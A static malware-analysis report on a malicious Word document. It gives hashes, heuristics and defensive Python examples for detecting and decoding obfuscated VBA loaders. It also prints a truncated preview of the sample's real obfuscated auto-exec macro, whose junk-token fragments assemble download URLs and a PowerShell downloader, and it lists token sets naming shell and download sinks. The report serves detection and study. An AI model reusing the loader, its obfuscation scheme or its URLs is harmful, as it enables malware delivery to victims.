Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7cc40563239fef6…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 129.5 KB
Created: 2018-02-14 17:21:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 510687f974d2125e7ddff34fa778e2dc
SHA-1: ef7ea1ced00479bf55e9c5a409697bd1042070d2
SHA-256: d7cc40563239fef6da1810664aff07d8ac41c0583977bade85b8cf7d61fd490b
Risk score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Word (OLE) document carrying obfuscated VBA macros. Critical heuristics indicate an auto-executing loader that uses Shell() calls and a custom string decoder. Its apparent purpose is to download and execute a second-stage payload from a URL that is never present intact in the source: it is assembled at run time from substrings interleaved with junk tokens that are stripped before use, so the URL, and the CreateObject/Shell strings around it, are invisible to plain string scanning of the macro text. The extracted fragments also contain PowerShell-style syntax ([sTrIng][cHaR]39, .rePlacE, System.Net.), which suggests the Shell() call launches PowerShell with the downloader logic in the decoded command line. Verify the decoded command by emulating the string builder or by detonating the sample in a sandbox rather than inferring it from the source alone.

Heuristics (8)

  • ClamAV detection (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448733-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The VBA code calls Shell(), a direct process-execution sink.
  • Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    An auto-executing macro reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source, so string- and signature-based scanning of the source alone misses them.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    The project defines an AutoOpen procedure, which Word runs as soon as the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or performance-cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered by this check and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that olevba did extract a VBA project from this sample (see Extracted artifacts below); the VBA findings above are the stronger evidence and this marker carries little additional weight here.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label names the channel (macro, JS, link annotation, document body, ...) through which each URL was reached.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)
    This is the standard Office Open XML DrawingML namespace identifier and appears in benign documents as well; it is not a payload location. The download URLs of interest are the ones the macro assembles at run time, which do not appear intact in the source.
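The p-code heuristic above looks for an auto-execution name and an execution or download token occurring together in the compiled VBA or performance-cache streams. Those parts of a module stream are not compressed the way the source-code part is, so the identifiers survive when source extraction fails or when the source has been stomped. The following is an added example, not the scanner's own code, of that check run over raw OLE stream bytes in both ASCII and UTF-16LE. The token lists are an assumption made for the demonstration, the stream names and byte strings are constructed, and the olefile calls are only for use on a real file.

```python
# Added example, not the scanner's own code: flag VBA-related OLE streams whose
# raw bytes carry an auto-execution name together with an execution/download
# token, the co-occurrence OLE_VBA_PCODE_AUTOEXEC_EXEC describes. Token lists
# are an assumption for the demo, not the scanner's; the sample streams below
# are constructed byte strings, not data from the analysed file.

AUTOEXEC_TOKENS = [
    "AutoOpen", "Document_Open", "AutoExec", "Auto_Open",
    "Workbook_Open", "AutoClose", "Document_Close",
]
EXEC_TOKENS = [
    "Shell", "WScript.Shell", "CreateObject", "ShellExecute", "powershell",
    "cmd.exe", "URLDownloadToFile", "XMLHTTP", "ADODB.Stream",
]


def find_tokens(stream, tokens):
    """Tokens present in `stream`, matched case-insensitively as ASCII or UTF-16LE."""
    low = stream.lower()          # bytes.lower() folds ASCII only, which is all we need
    hits = []
    for tok in tokens:
        needle = tok.lower()
        if needle.encode("ascii") in low or needle.encode("utf-16-le") in low:
            hits.append(tok)
    return hits


def scan_stream(name, data):
    """One stream -> findings; `flag` is the heuristic verdict for that stream."""
    auto = find_tokens(data, AUTOEXEC_TOKENS)
    execs = find_tokens(data, EXEC_TOKENS)
    return {"stream": name, "autoexec": auto, "exec": execs,
            "flag": bool(auto) and bool(execs)}


def flagged_streams(streams):
    """Names of the streams where an auto-exec token and an execution token co-occur."""
    return [name for name, data in streams.items() if scan_stream(name, data)["flag"]]


def scan_ole_file(path):
    """Walk every stream of a real OLE file with olefile (pip install olefile)."""
    import olefile                # imported here so the demo runs without it installed
    ole = olefile.OleFileIO(path)
    try:
        streams = {"/".join(entry): ole.openstream(entry).read()
                   for entry in ole.listdir(streams=True, storages=False)}
    finally:
        ole.close()
    return flagged_streams(streams)


# Constructed stand-ins for OLE streams (not bytes from the analysed file).
SAMPLE_STREAMS = {
    # UTF-16LE auto-exec identifier plus ASCII and UTF-16LE execution tokens: fires
    "Macros/VBA/Module1": (b"\x01\x16\x03\x00" + "AutoOpen".encode("utf-16-le")
                           + b"\x00\x00\x41\x11WScript.Shell\x00\x08"
                           + "powershell -enc".encode("utf-16-le")),
    # auto-exec name but no execution sink: does not fire
    "Macros/VBA/ThisDocument": b"\x01\x16Document_Open\x00MsgBox\x00",
    # execution sink but no auto-exec name: does not fire
    "Macros/VBA/Helper": b"CreateObject\x00" + "Shell".encode("utf-16-le"),
    # unrelated binary stream
    "WordDocument": b"\xec\xa5\xc1\x00" * 4,
}

if __name__ == "__main__":
    for name, data in SAMPLE_STREAMS.items():
        print(scan_stream(name, data))
```

The bare token "Shell" is deliberately noisy (it also matches ShellExecute and any project that merely references the Shell function), which is why the verdict requires the auto-exec token in the same stream; tune both lists on a clean corpus before using this as a detection rather than triage. The same co-occurrence check is what keeps a VBA-stomped document (p-code intact, source removed or replaced) from scoring as benign.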

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23928 bytes
SHA-256: d16c95d66b098c687837c632d774dce5dafbe87981588802f1b99c58c2fb7218

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aiNiCfrApT"
Function NilCSnTOVHMwK()
On Error Resume Next
owdYRmm = (wrkjm - Int(uutrvYwRWwBJLZ) * zfFBMWMIi / Oct(pOhULG) - (wkSafsUrDT - Sin(9032657)))
OLIWFUI = (HKnsiw - Int(ffZZhlL) * FJRwKrYKaGw / Oct(mkJJCRCa) - (BVCYzbwYLkoUKO - Sin(6457550)))
wnQSWfVuRuo = (XkOjzMlhbYuV - Int(XQjkjDoO) * LQamPVIAc / Oct(cYfhorzpj) - (wajcInUFj - Sin(5179867)))
wYquM = (PBkREJTwR) + HJjkJKD("IKKZnKoWNf8+Nf8RENf8+Nf8xBR6uK8+uK8'+'/?htNf8+Nf8tp:/pv2+pv2/Nf8+Nf8www.socNf8+Nf8iNf8zItPZjLPXYjFBkEptRmqbOwkYwiYsi", 9, 78)
uzcNl = (bkjzdbBDQBLiB - Int(IqhlsUwViIj) * vmKqqwpd / Oct(oOMkVOVKu) - (LqLaELz - Sin(4323733)))
ZRVrm = (zFGaOMfPtaK - Int(tXIUbVB) * FaLjwYakL / Oct(frZFjS) - (owXpzckkwRT - Sin(546714)))
cqupBTwPKPh = (cpwziX - Int(XipmvDnuTpnrq) * nXdhGzbzzGHh / Oct(cptZaJ) - (KJIltwppQ - Sin(1363550)))
GXzvXnoiN = (PZawYtrrivtkOE) + HJjkJKD("zKNLAce(Nf8JskNf8,[sTrIng][cHaR]39)) pv2)uK8+uK8.rePlacE(pv2Nf8pv2,[sTRInG][CHar]39).rePlacE(([CHar]116+[CHaruK8+uK8]uK8+uK854+[CHar]113)'+',[sTRInG][CHaSHZlQPzz", 4, 150)
Vuhbw = (SbdPrnJHlis - Int(fVmnYYHCjF) * fYGfzdkqrRtt / Oct(LCdfOSjomHztK) - (jBIKzMowq - Sin(7033970)))
RjIuzkUoNb = (KiBsBK - Int(bvbVvcnQZwtR) * moFDoi / Oct(uhDNLs) - (DofwkzNRP - Sin(9317622)))
ijiLnqsp = (GjWimpF - Int(cVWYzESDq) * rOKCFkcuCITuU / Oct(JshCkMuNH) - (PBhPhrSuWYXh - Sin(201825)))
hKnzOp = (ijiOzLEaQM) + HJjkJKD("LbcHaR]54),[sTrIng][cHaAcvBHtAXZVwvHrPRPF", 3, 21)
ZKTUL = (DCNNKqZXwCbr - Int(bzHCZKjhAl) * cUBbs / Oct(tadRXksfd) - (fLEtnN - Sin(8810826)))
NoHHGbAJM = (VWwDwrFDQMkqo - Int(iXIAOLDNPXwDAV) * rNPaLGWcpilLUT / Oct(umShhhlmwhl) - (HZHtqk - Sin(1430390)))
Ekpld = (zUPdsHvSW - Int(AjujcKlTnO) * aQsZwP / Oct(ilvbM) - (jZWooZlSQVhCN - Sin(4461011)))
Gmworjn = (FiBwOEXQSdzdHX) + HJjkJKD("VJ+uK8f8+Nf8Jsk+JNf8+NfuK8+u'+'K88skeJskpv2+uK8+u'+'K8pv2+Nf8+NuK8+uK8f8Jpv2+uzHRmZsBsVn", 3, 76)
QBBTJCl = (vKXlsFl - Int(YfTbHVzluh) * jioJfNTvJLriQ / Oct(NIMjIAnzII) - (DYvjnKkjjEjGB - Sin(8429597)))
crocEE = (YJbRhwDwu - Int(nFmhFlW) * PcpYOWAGBja / Oct(CLolbdVqbwz) - (BTAFwzdTJb - Sin(7218485)))
JozEbIlOX = (iAvFRav - Int(WMLbQBFbP) * ETcNWvWuICC / Oct(YaZYDb) - (QZABcFpIYpz - Sin(8735314)))
CWsKABHjjP = (hYWzDCnwfOcn) + HJjkJKD("PqKlmExNf8+Nf8wnNf'+'8+Nf8sNf8+Nf8adasdNfpv2+pv28+uK8+uK8'+'Nf8 '+'= &(Jspv2+pv2Nf8+Nf8knNuK8JXullN", 7, 87)
qsYDBsLj = (rzisw - Int(DRAIhn) * FLJADuDHmiwjhC / Oct(IHpBXVzzPJE) - (TAlLvLlQG - Sin(6835758)))
iHOKQSs = (MtjvFPfJ - Int(EUIsTjPc) * MtqwXj / Oct(AXDXwl) - (ZncIraskjA - Sin(7562250)))
BjihzEAtdml = (zrtrPwII - Int(pdOVwoErclVSs) * EqXXBPbKqKF / Oct(PHfnbndhjKOn) - (mnsHOSAHIoBrYH - Sin(8690341)))
CEWQcd = (dzjWRsUPnk) + HJjkJKD("VimbuzjTEwDf8uK8+uK8+Nf8u/XEZ8sF/JskNfpv2+pv28+Nf8.SplNpv2'+'+pv2f'+'8+Nf8it(JsuK8+uK8k?JsuK8+uK8k)Nf8+Nf8;3Nf8+Nf8xw'+'SDC =Nf8+NfuK8+uK88 3xwNf8+Npv2+pv'+'2f8env'zjBAjB", 12, 153)
FXrJGJCSUzk = (sEdGSivDfj - Int(DYLXjNq) * SEkLzIuZHvs / Oct(jdJKKiSi) - (sHBFvwUQMtB - Sin(7167638)))
BRhufLAkEqt = (kYHtf - Int(YFoHnSfaPAMAuM) * ZzjGBMZIvBrjht / Oct(CRCTGcEzOmQV) - (QztGZD - Sin(1967634)))
VKuqOL = (YnimwwsFvm - Int(hdzvzbGWVzUTlq) * rvIkHdiJ / Oct(iYjHfLtSAS) - (bSDvfSjpdDTs - Sin(9243709)))
idTJuBHS = (KhpKztckcObjC) + HJjkJKD("mnKlazmf8+Nf8suK8+uK8kpv2+pv2-Nf8+Nf8objNf8+Nf8ectJ'+'sk)Nf8+pv2+pvuK8+uK82Nf8 SNf8+Nf8pv2+pv2ystem.Net.N'+'uK8+uK8f8+Nf8wTKlkqajJtjKidCpZmXIXE", 8, 114)
MNbuzAM = (sMFoztjaK - Int(kdaPvHUwoHz) * XkUpfZBzYtmj / Oct(kFrWF) - (sHsJVRuIvzVO - Sin(6949187)))
lOvii = (GpVTINGZL - Int(rqtKLB) * bjUGifawYl / Oct(GADiCGwv) - (XOrhTvkSiXjz - Sin(8751392)))
zziwa = (tiQSbJuUk - Int(pSKEMomMPR) * Nrmmiu / Oct(TACTMi) - (zmnWlq - Sin(501135)))
JZipY = (uwrJECTTCs) + HJjkJKD("LzjFRrra.com/1RurEqNf8+Nf8F/Nf8+Nf8?httuK8+'+'uK8p://mNf8+Nf8cfNf8+Nf821.ruK8+uK8uNuK8+uK8f8+Npv2+pv2f8pv2+pv2/LaZEJ", 7, 106)
Jmqt
... (truncated)
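The obfuscated-loader heuristic names three decoder shapes (numeric char array, repeated hex-string decode, junk-token Replace removal), and the preview shows the third: fragments such as "www.socNf8+Nf8i" carry recurring filler tokens, and the arithmetic lines that reference undefined variables appear to be filler whose errors On Error Resume Next swallows. The helper HJjkJKD(string, start, length) is not in the preview; its argument shape is consistent with a Mid-style substring wrapper, which is an inference here, not something the report states. The following added example, which is neither the sample's code nor the scanner's, statically emulates the VBA string-building calls such a loader uses (Chr, & concatenation, Mid, Replace, StrReverse) and decodes the other two shapes. Every input in it is constructed for the demonstration; nothing in it is decoded data from this sample.

```python
import re

# Added example, not the analysed macro's code: statically emulate the VBA
# string-building calls an obfuscated loader uses to assemble its
# CreateObject/Shell/URL strings, plus the two other decoder shapes the
# heuristic names. All inputs used below are constructed, not sample data.

STR = r'"((?:[^"]|"")*)"'          # one VBA string literal; "" escapes a quote


def _lit(s):
    """Python string -> VBA literal."""
    return '"' + s.replace('"', '""') + '"'


def _unlit(body):
    """Body of a matched VBA literal -> Python string."""
    return body.replace('""', '"')


def _mid(m):
    s, start, length = _unlit(m.group(1)), int(m.group(2)), int(m.group(3))
    return _lit(s[start - 1:start - 1 + length])     # VBA Mid() is 1-based


# Each rule rewrites an innermost call whose arguments are all literals.
RULES = [
    (re.compile(r'\bChr[W$]?\(\s*(\d+)\s*\)', re.I),
     lambda m: _lit(chr(int(m.group(1))))),
    (re.compile(STR + r'\s*[&+]\s*' + STR),
     lambda m: _lit(_unlit(m.group(1)) + _unlit(m.group(2)))),
    (re.compile(r'\bStrReverse\(\s*' + STR + r'\s*\)', re.I),
     lambda m: _lit(_unlit(m.group(1))[::-1])),
    (re.compile(r'\bMid\(\s*' + STR + r'\s*,\s*(\d+)\s*,\s*(\d+)\s*\)', re.I),
     _mid),
    (re.compile(r'\bReplace\(\s*' + STR + r'\s*,\s*' + STR + r'\s*,\s*' + STR
                + r'\s*\)', re.I),
     lambda m: _lit(_unlit(m.group(1)).replace(_unlit(m.group(2)),
                                                _unlit(m.group(3))))),
]


def simplify(expr, max_rounds=500):
    """Apply the rules until nothing changes; a fully static expression ends as one literal."""
    for _ in range(max_rounds):
        new = expr
        for pat, fn in RULES:
            new = pat.sub(fn, new)
        if new == expr:
            break
        expr = new
    return expr


def decode_literal(expr):
    """Decode to a plain string; raise if a variable or unknown call is left over."""
    out = simplify(expr)
    m = re.fullmatch(r'\s*' + STR + r'\s*', out)
    if m is None:
        raise ValueError("expression is not fully static: " + out)
    return _unlit(m.group(1))


def decode_char_array(text, key=0, sep=None):
    """Numeric char-array shape: the macro does Chr(n - key) over a list of numbers."""
    return ''.join(chr(int(n) - key) for n in text.split(sep))


HEX_RE = re.compile(r'^(?:[0-9A-Fa-f]{2})+$')


def decode_hex_layers(s, max_layers=8):
    """Repeated hex-string shape: peel layers while the result is still printable ASCII."""
    layers = 0
    while layers < max_layers and HEX_RE.match(s):
        raw = bytes.fromhex(s)
        if not all(0x20 <= b < 0x7f or b in (9, 10, 13) for b in raw):
            break
        s, layers = raw.decode('ascii'), layers + 1
    return s, layers


if __name__ == '__main__':
    # Constructed expressions in the shape of the preview above, not its strings.
    print(decode_literal('Chr(104) & Chr(116) & "tp://"'))
    print(decode_literal('Replace("www.Nf8+Nf8examNf8+Nf8ple.com", "Nf8+Nf8", "")'))
    print(decode_literal('Mid("zItPZhttp://x/y.exePtRm", 6, 14)'))
    print(decode_char_array("113 125 125 121 67 56 56", key=9))
    print(decode_hex_layers("363336643634"))
```

Run it over the source olevba extracted: an expression that does not reduce to one literal (a variable, or a user-defined helper like the preview's HJjkJKD) is left in place, so the analyst sees exactly which definition still has to be inlined before the indicator appears. Literal text that happens to look like Chr(65) is rewritten too; this is an indicator extractor, not a VBA interpreter. Note that the fragments in the preview also carry a second, PowerShell-level layer ('+' concatenation and .rePlacE calls with [cHaR]39), which needs its own pass once the VBA layer has been resolved.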